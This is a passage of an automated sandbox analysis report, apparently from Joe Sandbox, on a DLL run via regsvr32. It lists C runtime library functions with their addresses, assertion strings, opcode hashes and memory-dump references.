                                                                                0x7ffa5247f271
                                                                                0x7ffa5247f27f
                                                                                0x7ffa5247f281
                                                                                0x7ffa5247f289
                                                                                0x7ffa5247f28b
                                                                                0x7ffa5247f298
                                                                                0x7ffa5247f2a4
                                                                                0x7ffa5247f2b0
                                                                                0x7ffa5247f2b5
                                                                                0x7ffa5247f2d3
                                                                                0x7ffa5247f2d5
                                                                                0x7ffa5247f2da
                                                                                0x7ffa5247f2e0
                                                                                0x7ffa5247f2ed
                                                                                0x7ffa5247f2f6
                                                                                0x7ffa5247f2f8
                                                                                0x7ffa5247f305
                                                                                0x7ffa5247f30e
                                                                                0x7ffa5247f321

                                                                                APIs
                                                                                Strings
                                                                                • _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2, xrefs: 00007FFA5247F0A4
                                                                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c, xrefs: 00007FFA5247F0B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide
                                                                                • String ID: _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c
                                                                                • API String ID: 3162172745-1617866167
                                                                                • Opcode ID: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                                                • Instruction ID: 59a62844a3b0f289c1758b23412e1c533b70fde52b32bb33b007494ce318b55b
                                                                                • Opcode Fuzzy Hash: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                                                • Instruction Fuzzy Hash: 96910E32A1CA8186D760DB24E8503AAB7F0FB92B44F498135E69D47799DFBCE446CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52466BF0 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 127COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invoke_watson_if_oneof_swprintf_p
                                                                                • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                • API String ID: 792801276-1329727594
                                                                                • Opcode ID: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                                                • Instruction ID: c541508dc94947dff84f5a5c420df42b9c003d6900f261d875c837245fb8f948
                                                                                • Opcode Fuzzy Hash: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                                                • Instruction Fuzzy Hash: 6C611672A0DAC186E7349B51E8507AABBB1FB86740F548136DA8D47B99DFBCE404CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247F900 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 105COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: __doserrno$_invalid_parameter
                                                                                • String ID: (_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_get_osfhandle$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\osfinfo.c
                                                                                • API String ID: 747159061-3177431134
                                                                                • Opcode ID: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                                                • Instruction ID: d889bf42578c32ef97e94a5f9a1136c3909a66bfa0fc3faaeed281cff836b841
                                                                                • Opcode Fuzzy Hash: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                                                • Instruction Fuzzy Hash: 19519F72A2864696E7108B54E88036973F1FB82760F59D331E67D476ECDBFCE4028B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246BA60 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 78memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocH_enabledSize_invalid_parameter_is_
                                                                                • String ID: _expand_base$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\expand.c$pBlock != NULL
                                                                                • API String ID: 1608253119-1427866139
                                                                                • Opcode ID: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                                                • Instruction ID: eda0b896a4d51b69c88f434b3fdd59c78a77a6b803c486d184df0f955412a082
                                                                                • Opcode Fuzzy Hash: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                                                • Instruction Fuzzy Hash: 9541473192CB4682E7609B10F84436A77F0FB86B80F588235E69D52A9CDFBDF484CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524786B0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 282COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Buffer too small", 0)$_vsnwprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c$format != NULL$string != NULL && sizeInWords > 0
                                                                                • API String ID: 2123368286-2958264153
                                                                                • Opcode ID: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                                                • Instruction ID: 21d664820b82a056aa85d550d742602ae13a0895b4aad450b701794ea8eac873
                                                                                • Opcode Fuzzy Hash: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                                                • Instruction Fuzzy Hash: 9FE11E3191DA868AE6708B24E84436A73F0FB86764F188235E6AD437DDDFBCE445DB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247C1A3 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 251COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 1967237116-569934968
                                                                                • Opcode ID: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                                                • Instruction ID: 148027add7e09617901c03ed099f7b50454c9cc57fbbf64937ce10358ef23e76
                                                                                • Opcode Fuzzy Hash: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                                                • Instruction Fuzzy Hash: 5BD1F57250CAC68AE7718B14E8503AAB7F4F785744F184135EAAD86A9DDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247BFDE Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 212COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00007FFA7FFA5247BFDE(char _a696, char _a976) {

				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0x5247ca31;
				goto __rax;
			}



                                                                                0x7ffa5247bfe6
                                                                                0x7ffa5247bff7
                                                                                0x7ffa5247c006
                                                                                0x7ffa5247c02d

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: wctomb_s
                                                                                • String ID: $("Incorrect format specifier", 0)$7$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2215178078-1895985292
                                                                                • Opcode ID: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                                                • Instruction ID: 5693993a436d2286327f220cbf59ea58584b5acd74a6541b8eb7bad1ee04bcd3
                                                                                • Opcode Fuzzy Hash: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                                                • Instruction Fuzzy Hash: 54B1077250C6C68AE771CB14E8853AAB7F4F785744F088136E6AD86A9DDBBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52472260 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 185COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL$string != NULL && sizeInBytes > 0
                                                                                • API String ID: 2123368286-348877268
                                                                                • Opcode ID: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                                                • Instruction ID: 14975f8774797eee51e9184b844ad3f3757a854f4c2c6ae7591a686c9c3d2a12
                                                                                • Opcode Fuzzy Hash: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                                                • Instruction Fuzzy Hash: 11912C3191CA4286E760CB24E85476A77F0FB86354F188235E6AD47BECDFBCE4458B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247BB66 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$(ch != _T('\0'))$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-4087627024
                                                                                • Opcode ID: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                                                • Instruction ID: d50ff1424286c9911e124f544748b6b2b13aa7fb857a8b04262d30381f357936
                                                                                • Opcode Fuzzy Hash: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                                                • Instruction Fuzzy Hash: C271306291C6C685E7B09B20E8543BE77F4EB86344F488135D6AC86A9EDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52470FD0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: dst != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\memcpy_s.c$memcpy_s$sizeInBytes >= count$src != NULL
                                                                                • API String ID: 2123368286-3692278645
                                                                                • Opcode ID: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                                                • Instruction ID: be8253c8859652bc721a5698aabbdf542aa389e51f2d71ca027574c554a6ae67
                                                                                • Opcode Fuzzy Hash: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                                                • Instruction Fuzzy Hash: 43514A3291C68696F7608B10E84437A76F0FB96344F588035E69E57A9CCFFDE545CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246BC30 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _free_base_malloc_base
                                                                                • String ID:
                                                                                • API String ID: 3824334587-0
                                                                                • Opcode ID: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                                                • Instruction ID: 7a990f7b77e6bdd006dd2554f04aea65db73dba116dac9f2704552dd3f026af3
                                                                                • Opcode Fuzzy Hash: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                                                • Instruction Fuzzy Hash: 2A310E3191CA8286E6609B60EC4433EB7F1FB86754F188535E69D5669DCFFCF5818B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524663E0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 143COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$state != NULL
                                                                                • API String ID: 2123368286-817335350
                                                                                • Opcode ID: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                                                • Instruction ID: 6e8ab8c3b6f718918b00cfe3586a1e8135d4eb78a27ae822e9847d7c94ee11c7
                                                                                • Opcode Fuzzy Hash: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                                                • Instruction Fuzzy Hash: B561ED36A18B4596EB14CB19E89132A77F0FB86794F248135EB8D47BA8CF7DE451CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246CFF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 138COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00007FFA7FFA5246CFF0(intOrPtr _a8) {
				intOrPtr _v24;
				long long _v48;
				long long _v64;
				intOrPtr _t21;

				_a8 = _t21;
				_v48 = 0;
				_v64 = 0;
				_v24 = _a8;
				_v24 = _v24 - 2;
				if (_v24 - 0x14 > 0) goto 0x5246d13e;
				goto __rax;
			}







                                                                                0x7ffa5246cff0
                                                                                0x7ffa5246cff8
                                                                                0x7ffa5246d000
                                                                                0x7ffa5246d010
                                                                                0x7ffa5246d01b
                                                                                0x7ffa5246d024
                                                                                0x7ffa5246d048

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Invalid signal or error", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c$raise
                                                                                • API String ID: 2123368286-2245755083
                                                                                • Opcode ID: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                                                • Instruction ID: b564615e5252428421880e4fe8b3f2563968ff19dd30a29cf8f0db3838165b5a
                                                                                • Opcode Fuzzy Hash: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                                                • Instruction Fuzzy Hash: BA71D932A1C692CAE7648B14E85436AB7F0FB86754F188135E68E47B98CFBCE444CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52465AD9 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 77memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: HeapPointerValid
                                                                                • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$L7$LX
                                                                                • API String ID: 299318057-1988567080
                                                                                • Opcode ID: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                                                • Instruction ID: 06f64bca12a651b5fbb60543aafbc34b4c4a32f21945be4651f3edb8767a5a9d
                                                                                • Opcode Fuzzy Hash: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                                                • Instruction Fuzzy Hash: FA314471A1C78796EB64CB15EC4123967F5FB46780F588035E64D87BA8DFACE540CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246C7E9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: EncodePointer$_realloc_dbg
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\onexit.c$}
                                                                                • API String ID: 429494535-1858280179
                                                                                • Opcode ID: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                                                • Instruction ID: d48f703be94db6cc1ec72ff4ec3ac2447f88fe0eab01aed0393c9009d370df85
                                                                                • Opcode Fuzzy Hash: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                                                • Instruction Fuzzy Hash: 2C41A432629B8596DA50CB45F88432AB7B4FB8A794F105035FB8E43B68DFBDD0948B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52467280 Relevance: 12.1, APIs: 8, Instructions: 104COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                                                                • String ID:
                                                                                • API String ID: 3799933513-0
                                                                                • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                                                • Instruction ID: 462b90ac148f7cb9c6bf058075bf1f4a435f3339ee30a2c8023ebc58c0aa2df1
                                                                                • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                                                • Instruction Fuzzy Hash: 1951FE3292DA8295E7509B14FC4432A77F0FB86754F189135EA9D42BADDFBCE484CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247E16F Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 259COMMON
